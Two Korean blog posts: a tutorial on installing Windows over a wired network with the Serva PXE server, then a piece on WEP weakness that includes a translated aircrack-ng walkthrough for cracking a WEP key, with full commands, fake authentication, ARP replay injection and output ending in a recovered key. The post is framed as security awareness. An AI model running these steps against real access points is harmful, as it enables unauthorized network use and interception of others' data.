윈도우나 리눅스 설치시 보통 DVD나 CD ROM을 사용해서 설치를 합니다. 데스크탑이라면 보통은 설치를 해서 많이들

 

사용하실 텐데요. 노트북의 경우도 좀 덩치가 있는 것들은 DVD-RW를 내장하고 있는경우가 많지만 무게,크기 경량화를 위해

 

넷북이나 울트라씬 노트북의 경우 ODD를 제공하지 않는 경우가 대부분 입니다. 그래서 외장 ODD를 구입해서 사용하거나

 

고용량 USB에 윈도우 설치 DVD내용을 복사해서 부팅하는 방법을 선택해서 설치하는 경우가 많은데요. 이 과정들이 OS종류

 

마다 다를뿐더러 GRUB등을 MBR(Master Boot Record)에 심는 작업을 해야되는 번거로움을 거쳐야 될때가 많아서 저도

 

이제까지 ODD가 없으면 많이 시도해본적이 없습니다. 그러던 중에 구형넷북에 윈도우8을 설치하면 속도가 빠르다는 소식을

 

듣고 집에서 굴러다니는 넷북에 설치를 하려는데 제가 가지고 있는 메모리스틱은 4GB밖에 안되고 그나마도 다른 자료들이

 

들어있어서 사용할 수가 없고 SATA & IDE to USB 젠더가 있어서 ODD를 떼서 연결해서 설치할순 있지만 귀찮았습니다.

 

 

 

Serva구축 구성도

 

그래서 네트워크 설치를 시도해보게 됐는데 결론부터 말하자면 정말 편합니다. 요즘 PC들에는 대부분 네트워크 부팅 기능이

 

있기때문에 BIOS나 EFI에서 네트워크 부트만 설정하면 활용이 가능합니다. 이런행위를 가능하게 하려면 두가지 준비물이

 

필요합니다.

 

준비물 : 1. 윈도우 설치 DVD or ISO(ISO를 사용한다면 가상ODD 구축 프로그램 사용필수)

2. 윈도우 설치 DVD나 ISO를 공유할 서버용 PC

3. TFTPD를 사용하는 툴(Netboot), Serva

 

보통 인터넷에서 네트워크를 통한 윈도우 설치 방법을 보면 준비물 3에 해당하는 것중에 NetBoot를 통한 설치방법이 많이

 

발견됩니다만 이 툴은 윈도우XP를 설치할때는 간편하지만 상위버전 설치시에는 설정해줘야 할것도 많고 제대로 안될때가

 

많아서 추천하고 싶지 않습니다. 저 또한 많이 시행착오를 겪었구요. 찾던중 Serva라는 다용도 서버구축 툴이 있더군요.

 

HTTP,FTP기타등등의 서버를 간편하게 구축할수 있게 해주는 툴이었습니다. 여기서 목적은 윈도우 설치이므로 툴에 대한

 

자세한 설명은 생략하고 사용방법을 써보겠습니다. 우선 아래의 파일을 다운로드 하세요.

 

Serva_Non-Supporter_32_v2.1.4.zip

Serva_Non-Supporter_64_v2.1.4.zip

 

작업을 시작하기전 본 내용은 무선랜으로는 작업할 수 없고 유선랜으로만 가능하다는것을 알립니다. 그리고 내용은 공유기를

 

사용한 환경에서의 설정만을 다룹니다. 유동IP를 사용하는 경우도 설정 가능하지만 이 부분은 제외하겠습니다.

 

우선 위의 파일중 32나 64로 되있는것을 받습니다. 저의경우 64로 되있는 버전을 사용했는데 서버로 사용되는 PC의 OS가

 

64bit 일경우 사용하시면 됩니다.

 

1. 압축해제

  압축을 해제합니다. ex) D:\Serva , 그리고 따로 폴더를 하나 생성합니다. ex) D:\ServaRoot 이 D:\ServaRoot는 네트워크

  에서 공유될 윈도우 설치 파일들이 위치할 곳으로 매우 중요합니다. 핵심은 Serva 파일이 위치할 폴더와 윈도우 설치파일들이

  위치할 폴더를 따로 생성하는 것입니다.

 

 

 

2. Serva 환경설정

  Serva는 Donation 라이센스 프로그램입니다. 위 버전들은 Non Supporter 버전으로 기능제한이 있습니다만 아무 무리 없이

  활용가능합니다.

 

 

처음 실행하면 위와 같은 화면이 뜹니다. Settings를 눌러줍니다.

 

 

 

 

위와같이 TFTP 탭의 내용을 설정해 주는데 두번째 섹션의 'Bind TFTP to this address' 부분이 중요합니다. 보통 공유기를

 

사용한다면 192.168.0.1(공유기 IP)를 GateWay로 잡고 나머지 PC들이 공유하게 되는데 (ex)192.168.0.2 이 IP를 설정해 주는

 

것으로 시작 → 실행 → CMD 에서 IPCONFIG 명령을 통해 볼 수 있습니다. 여기서는 현재 Serva를 실행한 PC의 내부IP가

 

192.168.0.2 를 사용하는것으로 가정 하겠습니다. 매우 중요한 부분이므로 잘 따라하시면 됩니다.

 

이제 TFTP Server root Directory를 설정합니다. 앞서 Serva를 설치할때 만들었던 폴더 예와 같이 설정해 주시면 됩니다.

 

후에 이 폴더에 있는 윈도우 설치 파일을 공유하여 설치가 진행됩니다. 여기서는 D:\ServaRoot로 지정하겠습니다.

 

 

 

 

이제 DHCP서버를 설정해야 합니다. DHCP Server에 체크 하시고 Service Add-On에 체크하시고 위에서 TFTP탭을 설정했듯이

 

Bind DHCP to this address항목을 192.168.0.2로 설정합니다. 아래에 보시면 IP Poll 1st addr 항목이 있는데 이건 설치대상이

 

되는 PC가 사용할 IP주소 입니다. 공유기에서 따로 범위설정을 해서 막아놓은게 없다면 대강 아무 IP나 잡아주면 될겁니다.

 

여기선 이 IP를 192.168.0.3이라고 하겠습니다. 그리고 Pool size는 10으로 해주시고 Subnet Mask는 255.255.255.0으로 설정

 

합니다. 다 되셨으면 아래의 '확인' 버튼을 누르시면 Serva를 다시 실행하라는 메시지가 뜹니다. 다시 실행하시면 되며 재실행

 

후에 우선 Serva 프로그램을 종료해 놓습니다.

 

 

 

 

처음에 Serva를 설치할때 우리는 D:\(혹은 C:\) 에 Serva, ServaRoot라는 폴더를 두개 만들었습니다. 이번에 설정할 내용은

 

ISO나 DVD롬에 있는 윈도우 설치파일을 복사할 차례입니다. 위와같이 ex)D:\ServaRoot\WIA_WDS 폴더를 공유폴더로

 

지정합니다.

 

윈도우 7,8을 서버PC로 사용한다면 설정방법이 약간 다를수 있겠으나 결과는 동일합니다. 그리고 가장 중요한 것은 공유이름을

 

반드시 WIA_WDS_SHARE로 지정 하시기 바랍니다. 확인을 눌러서 완료하시고 D:\ServaRoot\WIA_WDS 이 폴더 내에

 

마음대로 폴더를 하나 만듭니다. ex)Windows7  그리고 그 폴더(D:\ServaRoot\WIA_WDS\Windows7) 에 윈도우 설치

 

DVD나 ISO에 있는 파일을 전부 복사 해서 넣어줍니다. 숨김파일이 있을수 있으므로 숨겨진 파일을 모두 볼수 있게 해서

 

복사 하시기 바랍니다. 네트워크 부팅시 Serva를 통해 위의 폴더의 내용을 인식하여 Windows를 설치 할 수 있습니다.

 

윈도우 XP나 2000의 경우 WIA_RIS 폴더, 리눅스의 경우 NWA_PXE 폴더에 위와 같은 작업을 수행해서 설치를

 

진행할 수 있습니다.

 

 

 

작업이 완료되면 위와 같은 구조가 될 것 입니다. 이제 Serva를 실행하고 설치대상인 PC를 네트워크 부팅 시킵니다.

 

BIOS나 EFI 구성에 따라 다르겠지만 통상 F12를 누르면 네트워크 부팅이 선택됩니다. 그러나 이미 OS가 설치된 상태라면

 

무시하고 넘어갈 수 있으므로 네트워크 장치를 부팅순서 최우선 순위로 두고 부팅하는것이 좋습니다

 

 

이제까지 작업이 제대로 됐다면 Serva에서 위와같이 Windows 부트 파일을 자동으로 알아차리고 물어봅니다. 이를 응용해서

 

위에서 설정한 ex)D:\ServaRoot\WIA_WDS\ 폴더에 여러가지 윈도우 버전에 따른 설치파일들을 위치시키면 여러개의

 

버전을 골라서 설치 할 수 있습니다.

 

 

 

위와같이 Serva의 부트로더로 부팅을 진행하게 됩니다.

 

 

 

부팅이 진행되면서 위와같이 서버PC의 사용자 ID와 비밀번호를 묻는 경우가 생깁니다. 앞에서 ServaRoot 폴더를 우리는 공유

 

폴더로 지정을 했었고 서버로 사용되는 PC의 윈도우에서 사용자 계정 암호가 걸려있으면 인증을 해야 공유폴더에 접근할 수

 

있기 때문에 묻는 것입니다. 서버 PC의 현재 로그인한 계정(ID)와 비밀번호를 입력하시면 됩니다. 어려우신 분들은

 

서버PC의 사용자 계정 암호를 삭제하고 접근해보셔도 될 것 같습니다. 아무튼 저렇게 ID와 PW를 입력한뒤 Connect를 누르고

 

인증이 완료되면 윈도우 설치 DVD를 넣고 작업한것과 동일한 셋업 화면을 보시게 됩니다. 이때부터는 설치작업을 진행하시면

 

되며 설치완료후 첫 재부팅시에 Serva를 종료하시면 됩니다.

 

※주의 : 위 이미지의 인증과정에서 ERROR : 0x37 Network resource is no longer available 이라는 메시지가

 

발견될 수 있는데 이는 네트워크 부팅 과정 이후의 설치 과정에서 설치대상PC의 Ethernet(LAN) 드라이버를 찾을 수 없어서

 

생기는 오류 입니다. 대개는 자동으로 알아 차리며 제 경우에도 Realtek 칩셋을 사용하는 Ehternet 드라이버를 자동으로

 

인식했습니다. VMWare는 이상하게 되질않네요.

 

여기까지 Serva를 이용한 네트워크 부팅을 통한 윈도우 설치 방법에 대해서 알아봤습니다. OS를 설치하려는데 DVD를 넣고

 

빼는것이 귀찮은 분들, 테스트 용도로 OS를 이것저것 설치해봐야 할 경우가 많을때 Serva는 위와같이 몇가지 설정만 거치면

 

셋업서버 용도로 사용할 수도 있는 매우 유용한 툴입니다. 저도 이번에 처음 사용해 봤는데 상당히 유용해서 집에 몇가지

 

윈도우 버전을 올려서 셋업서버로 구축해둔 상태입니다. 필요하신 분들은 참고하시기 바랍니다.

 

 

 

 

신고
인터넷 혹은 컴퓨터 몇대간의 근거리 통신망은 갈수록 우리생활에서 떼놓기 어려운 존재가

되가고 있습니다. 2000년 초반부터 급격히 유선 인터넷망이 성장해오면서 KT에서 내놓은 무선

인터넷 서비스인 네스팟이 출현했었는데요. 우리나라의 경우 다른 큰 국가들에 비해 토지면적이 작기

때문에 유선망이 워낙에 잘되있어서 네스팟이 빛을 발휘하지 못하고 있습니다. (대학교를 중심으로

많이 설치됐었는데 이또한 제가 보기엔 찬밥신세를 면하지 못하는듯 싶네요.) 지금의 경우

서울,수도권지역은 와이브로서비스로 원활한 인터넷 서비스를 즐길수는 있지만 문제는 금액이죠.

집에서 하루종일 켜놓고 인터넷 쓰는것 처럼 와이브로 서비스를 사용한다면 집안 거덜낼수

있습니다. 사설이 좀 길어졌는데 이렇게 무선인터넷망도 조금씩 발전해오면서 몇년전부터

가정에서 무선인터넷 서비스를 이용하는 경우가 많아지고 있습니다. 그리고 집에 컴퓨터가

두대 이상인 가정이 생겨나면서 자연스레 유무선공유기도 많이 사용되고 있는데요.

그래서 무선인터넷이 왜 아직은 보안상의 문제가 있는지 써보려 합니다.

현재 무선통신시 많이 사용되는 암호화 프로토콜로는 WEP(Wired Equivalent Privacy)와 WPA

(Wifi Protected Access)등이 있습니다. 이 두 프로토콜의 개념등은 저도 네트워크 분야로는

자세히 모를뿐더러 이글의 주제와는 별상관이 없으니 그냥 '이런게 있구나' 라고만

알아두시면 됩니다. 이글에서는 WEP 프로토콜의 위험성에 대해 쓰겠습니다.

구글등에서 WEP해킹 또는 WPA해킹등으로 검색해보면 수많은 해킹관련 자료와 문서들을

볼수있습니다. 여기서 말하는 WEP해킹이나 WPA해킹으로 여러가지 피해가 발생할수 있겠지만

가장 간단한 피해로는 AP(Access Point)공유를 들수있겠습니다. 쉽게 내가 쓰고있는 무선인터넷

서비스를 누군가에게 공유하려는 생각이 없는데 누군가 같이 쓰고있다는것입니다. 이중에서

WEP해킹의 경우 명령어 몇줄만 쓰면 손쉽게 해킹이 가능합니다. 그래서 직접 시도해봤습니다.

캡쳐화면등은 일부러 전혀 남기지 않았고 인터넷에서 쉽게 찾아볼수 있는 자료를 붙혀넣기

했습니다. 원본출처 : http://skyfac.com (빨간글씨로 저의 의견등을 쓰겠습니다.)

(사용된 도구 : Eee PC 701(802.11b/g Atheros wireless lan),
Backtracks 3 Live CD(각종 네트워킹 관련툴이 포함된 Slackware 기반의 리눅스)

(수행하기전 자신의 무선네트워크 카드가 airsnort등의 프로그램을 지원하는지 확인해야합니다.
대부분 지원하는것으로 알고있는데 모델명만 약간 달라도 지원하지 않는경우가 더러 있다고하네요.)

사용자 삽입 이미지
Backtrack은 USB로 Live CD를 간단히 만들수가 있습니다.

실험에 앞서 일단 back track은 해킹툴 패키지가 아닙니다. 각종 네트워크툴을 모아놓은
보안관리툴이라고 보는것이 맞을듯 싶네요. 그리고 부디 악용하지 마시기 바랍니다.
사용시 생길수 있는 문제나 불이익등은 모두 개인에게 책임이 있습니다.
-----------------------------------------------------------------------------------------

AP의 WEB Key를 크래킹 하기 위해서는 수많은 양의 IVs(Initialization Vectors)를 모아야 한다. 평상시의 경우에는 이러한 IVs들이 빨리 생성되지 않는다. 만약 인내심이 많은 사람이라면 단지 네트워크의 트래픽을 저장하는 것 만으로도 WEB Key를 크래킹하기 위한 충분한 양의 IVs를 모을 수 있다. 하지만 이 글을 읽고 있는 대부분의 사람들은 이것을 참지 못할 것이기 때문에 Injectino이라고 부르는 기술을 사용할 것이다. Injection 기법은 AP에 보낸 패킷을 계속해서 빠르게 재전송하기 때문에 많은 수의 IVs를 짧은 시간내에 얻을 수 있다.



WEB Key를 크래킹 하기 위한 기본적은 단계는 다음과 같다.
  1. 무선랜을 모니터(monitor) 모드로 변경하기.
  2. aireplay-ng를 이용하여 AP에 가짜 인증(authentication) 하기.
  3. BSSID필터를 이용해 특정 AP 채널의 IVs 값들을 수집하기.
  4. aireply-ng의 ARP request replay 모드를 이용하여 패킷 주입하기.
  5. aircrack-ng를 이용하여 수집된 IVs 패킷 크래킹하기.


1단계 - 무선랜을 모니터(monitor) 모드로 변경하기

  먼저 랜카드를 '모니터' 모드로 변경하기 위해 이 단계를 실시한다. 모니터 모드란 공기 중에 흐르고 있는 모든 무선 패킷들을 랜카드가 수집(listen)할 수 있는 상태를 말한다. 보통의 경우에 랜카드는 모든 패킷기 아닌 자기 자신에게 오는 패킷만 받아들인다. 즉 모니터 모드는 패킷을 주입할 수 있도록 해 주는 단계이다.(참고: 아래의 과정은 Atheros 카드가 아닐 경우 다를 수 있다.)

먼저 ath0을 정지한다.

airmon-ng stop ath0


다음과 같이 나타난다.

Interface       Chipset         Driver
 
 wifi0           Atheros         madwifi-ng
 ath0            Atheros         madwifi-ng VAP (parent: wifi0) (VAP destroyed)


athX 인터페이스가 없는지 재확인 하기 위해 "iwconfig" 명령어를 이용한다.

 lo        no wireless extensions.
 
 eth0      no wireless extensions.
 
 wifi0     no wireless extensions.


만약 다른 종류의 athX가 남아 있다면 정지시키기 바란다.

이제, 랜카드를 채널 9에 모니터 모드로 변경시키기 위해 다음과 같이 입력한다.

airmon-ng start wifi0 9

Note : 이 명령에서는 우리가 사용하는 ath0대신 wifi0을 사용했는데 이는 madwife-ng 드라이버가 이미 사용중이기 때문이다.

다음과 같은 화면이 출력될 것이다.

Interface             Chipset             Driver
 wifi0           Atheros         madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0)
(monitor mode enabled)


 

이제 ath0이 모니터 모드로 변경되었다. iwconfig 명령을 통해 확인해 볼 수 있다.
  lo            no wireless extensions.
 wifi0     no wireless extensions.

eth0 no wireless extensions.

ath0 IEEE 802.11g ESSID:"" Nickname:""
Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0


2단계 - aireplay-ng를 이용하여 AP에 가짜 인증(authentication) 하기.

  이 단계에서는 생성된 IVs를 수집한다. 새로운 콘솔(console)을 열어서 다음과 같이 입력한다.

airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0


 

  • -c는 무선 네트워크의 채널을 의미한다. 이는 사용자의 환경에 따라 적절히 변경되어야 한다.
  • --bssid는 공격하고자 하는 AP의 MAC 주소를 의미한다.
  • -w는 IVs들이 담길 파일 이름을 지정한다.
  • ath0은 인터페이스 이름이다.

  그런데 이 명령을 수행하기 전에 먼저 bssid를 알아내야 한다. bssid 즉 공격하고자 하는 AP의 MAC주소는 다음과 같은 명령을 통해 확인할 수 있다. 또한 이 명령은 Injectino이 제대로 작동하는지 테스트 하는 명령이기도 하다.

aireplay-ng -9 ath0


시스템에 다음과 같은 화면이 출력된다.

 16:29:41  ath0 channel: 9
 16:29:41  Trying broadcast probe requests...
 16:29:41  Injection is working!
 16:29:42  Found 5 APs
 
 16:29:42  Trying directed probe requests...
 16:29:42  00:09:5B:5C:CD:2A - channel: 11 - 'NETGEAR'
 16:29:48  0/30: 0%
 16:29:48  00:14:BF:A8:65:AC - channel: 9 - 'title'
 16:29:54  0/30: 0%
 16:29:54  00:14:6C:7E:40:80 - channel: 9 - 'teddy'
 16:29:55  Ping (min/avg/max): 2.763ms/4.190ms/8.159ms
 16:29:55  27/30: 90%
 16:29:55  00:C0:49:E2:C4:39 - channel: 11 - 'mossy'
 16:30:01  0/30: 0%
 16:30:01  00:0F:66:C3:14:4E - channel: 9 - 'tupper'
 16:30:07  0/30: 0%


위의 화면에서 볼 수 있듯이 BSSID 들이 AP별로 출력되고 있다.

다시 2단계의 명령으로 돌아가 보자. Injection이 발생하면 다음과 같은 화면을 볼 수 있다.

CH  9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25
                                                                                                             
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
                                                                                                           
 00:14:6C:7E:40:80   42 100     5240   178307  338   9  54  WEP  WEP         teddy                          
                                                                                                           
 BSSID              STATION            PWR  Lost  Packets  Probes                                            
                                                                                                           
 00:14:6C:7E:40:80  00:0F:B5:88:AC:82   42     0   183782



3단계 - BSSID필터를 이용해 특정 AP 채널의 IVs 값들을 수집하기.

AP가 패킷을 받아들이기 위해서는 반드시 대상 MAC 주소와 연결이 이루어져야 한다. 만약 대상 MAC주소와 연결이 이루어져있지 않은 상태에서 패킷을 보낸다면 AP는 패킷을 무시하고 대신 DeAuthentication 패킷을 반출한다. 이런 경우에는 AP가 주입된(Injected) 모든 패킷을 무시하므로 새로운 IVs가 발생되지 않는다.

  Injectino이 실패하는 가장 큰 이유 중 하나가 바로 AP와의 연결(Association)이 이루어지지 않았기 때문이다. 따라서 반드시 다음을 사항을 잊지마라 : Injection을 하고자 하는 AP의 주소는 가짜 인증(fake authentication)이나 벌써 연결된 클라이언트를 이용하여 반드시 연결되어야 한다.

AP와 연결하기 위해 다음과 같은 가짜 인증 명령을 내보낸다.

aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0


 

  • -1은 fake authentication을 의미한다.
  • 0은 초당 재연결 시간을 의미한다.
  • -e teddy는 무선 네트워크 이름을 의미한다.
  • -a 00:14:6C:7E:40:80은 AP의 MAC 주소를 의미한다.
  • -h 00:0F:B5:88:AC:82는 자신의 랜카드 MAC 주소를 의미한다.
  • ath0은 무선 네트워크 interface 이름이다.


가짜 인증이 성공하면 다음과 같이 출력된다.

18:18:20  Sending Authentication Request
18:18:20  Authentication successful
18:18:20  Sending Association Request
18:18:20  Association successful :-)



4단계 - aireply-ng의 ARP request replay 모드를 이용하여 패킷 주입하기.

  이 단계는 aireplay-ng를 이용하여 ARP request를 네트워크에 재주입시키는 과정이다. ARP request를 재주입하는 이유는 AP는 보통 ARP request를 받으면 새로운 IV를 생성하여 반출하기 때문이다. 이를 통해 우리는 짧은 시간내에 많은 양의 IVs를 수집할 수 있게 된다.

새로운 콘솔을 실행한 후 다음 명령을 입력한다.

aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0


ARP request가 주입되기 시작하면 다음과 같은 화면이 출력된다.

 Saving ARP requests in replay_arp-0321-191525.cap
 You should also start airodump-ng to capture replies.
 Read 629399 packets (got 316283 ARP requests), sent 210955 packets...


처음에는 Read의 packets 수만 올라가고 ARP requests를 받는 데 시간이 좀 걸릴 수 있다. 일정시간이 지나고 나면 위의 내용처럼 숫자들이 올라가기 시작한다.

airodump-ng가 실행되고 있는 콘솔을 보면 Injecting이 잘 이루어지고 있는지 확인할 수 있다. 데이터 패킷의 수가 급격하게 증가하고 있을 것이다.


5단계 - aircrack-ng를 이용하여 수집된 IVs 패킷 크래킹하기.

이제 남은 것은 수집된 IVs 정보를 이용해 WEP 키를 추출하는 것이다. 새로운 콘솔을 실행한 뒤 아래와 같이 입력해보자.

aircrack-ng -z -b 00:14:6C:7E:40:80 output*.cap
  • -z는 PTW WEP-cracking 방법을 이용한다는 뜻이다.
  • -b 00:14:6C:7E:40:80는 공격의 대상이 되는 AP의 MAC 주소이다.
  • output*.cap는 output으로 시작하면서 확장자가 cap인 모든 파일을 의미한다.


지금까지의 모든 과정이 순조롭게 이루어졌다면 WEP 키는 금방 찾아낼 수 있다. 이를 위해서는 대략 64비트일 때는 250,000개의 IVs, 128비트일 때는 1,500,000개의 IVs가 필요하다. PTW 공격방법을 사용한다면 20,000 패킷(64비트)에서 40,000~85000 패킷(128비트)이 필요하다. 이는 매우 대략적이기 때문에 상황에 따라 필요한 패킷이나 IVs는 달라질 수 있다.

WEP 키를 얻는 데 성공했다면 다음과 같은 화면이 나타날 것이다.

(신호가 약할경우 IVs를 모으는데 시간이 많이 걸릴뿐더러 제대로 모이지가 않습니다.
제 경우에는 첫시도 장소에서 신호가 약해 다른 강한신호가 잡히는곳에서 시도해서 성공했습니다.)

Aircrack-ng 0.9
 
 
                              [00:03:06] Tested 674449 keys (got 96610 IVs)
 
 KB    depth   byte(vote)
  0    0/  9   12(  15) F9(  15) 47(  12) F7(  12) FE(  12) 1B(   5) 77(   5) A5(   3) F6(   3) 03(
  0)
  1    0/  8   34(  61) E8(  27) E0(  24) 06(  18) 3B(  16) 4E(  15) E1(  15) 2D(  13) 89(  12) E4(  12)
  2    0/  2   56(  87) A6(  63) 15(  17) 02(  15) 6B(  15) E0(  15) AB(  13) 0E(  10) 17(  10) 27(  10)
  3    1/  5   78(  43) 1A(  20) 9B(  20) 4B(  17) 4A(  16) 2B(  15) 4D(  15) 58(  15) 6A(  15) 7C(  15)
 
                       KEY FOUND! [ 12:34:56:78:90 ]
      Probability: 100%


참고사항

  • 위의 문서는 아래 참고 문서의 일부분을 번역하여 옮긴 것이며 필자가 직접 작성한 부분도 있습니다.
  • 위의 문서는 WEP와 관련하여 무선 네트워크에 대한 보안 위협을 인식하기 위함이지 다른 네트워크를 침투하여 타인에게 피해를 입히기 위함이 아닙니다.
  • 위의 문서 내용으로 인해 발생한 모든 사고 및 손해 등에 대해서 필자는 절대 책임지지 않습니다.


* Reference

  1. http://www.aircrack-ng.org/doku.php?id=simple_wep_crack
  2. http://www.aircrack-ng.org/doku.php?id=injection_test

------------------------------------------------------------------------------------

위와같이 간단한 명령어 몇줄만으로 WEP키를 알아내서 암호화 되있는 어떤 AP를 공유해서

인터넷을 쓰는것이 가능해집니다. WPA해킹의 경우 시도해보지는 않았으나 WPA또한 이런

BackTrack등을 사용해서 해킹하는 방법을 손쉽게 찾아볼수 있기때문에 완전한 해결책이

될수는 없습니다. 게다가 암호화 방식은 하드웨어적으로 지원을 하는것인데 비교적 구형

무선랜카드를 사용한다면 WEP방식의 암호화를 사용합니다. 요새는 WPA2방식까지

암호화 방법을 선택할수 있는 기기들이 많이 출시되고 있습니다.

사용자 삽입 이미지

문제는 이러한 기기들이 아무곳에서나 편리하게 사용될수 있다는것인데 개인적으로 가정에서

사용하는것에는 큰 피해를 체감할수 없겠지만 기업체나 공공기관에서는 수많은 개인정보나

기업정보가 유출될수 있습니다. 위에서 들었던 예는 단순히 AP만을 공유해서 무선인터넷을

공짜로 쓰는데에만 촛점이 맞춰져있지만 더 큰 피해도 생길수가 있습니다. 예를 들면 주민등록

번호나 웹사이트 ID,비밀번호등이 유출될수 있겠죠. 어쨋든 개인적인 문제로 촛점을 맞추면 누구던지

허락하지 않았는데 누군가 내것을 막쓰고 있다면 불쾌할겁니다. 지금 무선인터넷 서비스를

쓰고 계신분들은 이런점들이 있구나하는것을 염두해 두시고 WEP방식을 쓰시는분들은 반드시

WEP키를 자주 변경하신다던지 하셔야겠고 WPA방식을 쓰시는분들도 자주 키를 변경하시는것이

좋을듯 싶습니다. 그리고 가급적이면 인터넷 뱅킹 서비스를 무선으로 사용하지 마시길 바랍니다.

제 경우엔 무선으로 이러한 서비스를 이용하진 않지만 유선으로 사용하는 인터넷뱅킹 계좌도

소액만 예금되있고 소액결제에만 사용하고 있습니다. 어쨋든.. 이런 위험한 요소들이 무선인터넷

사용시 항시 따라다니고 있으니 사용하시는분들은 한번씩 자신이 쓰고있는 무선랜 보안환경에

약간 신경을 써보는것이 좋을듯 싶습니다.

신고